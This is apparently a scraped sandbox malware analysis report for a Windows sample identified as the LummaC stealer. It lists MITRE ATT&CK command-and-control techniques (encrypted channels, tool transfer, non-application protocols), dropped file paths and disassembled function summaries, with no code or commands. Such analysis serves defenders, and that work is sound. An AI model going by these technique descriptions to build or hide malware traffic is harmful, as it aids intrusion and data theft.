Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TT4ybwWc1T.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT4ybwWc1T.exe.log

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
TT4ybwWc1T.exe

Function 6C90B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Function 074E0EB3 Relevance: 24.6, Strings: 19, Instructions: 800
COMMON

Function 6C8FB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Function 6C902970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Function 6C8FAF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Function 6C90D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Function 6C90D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Function 6C905140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Function 6C9044C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Function 6C90BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Function 6C9064D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Function 6C90CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Function 6C8FA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Function 6C9049B0 Relevance: 15.2, APIs: 10, Instructions: 174
COMMON

Function 6C9066A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre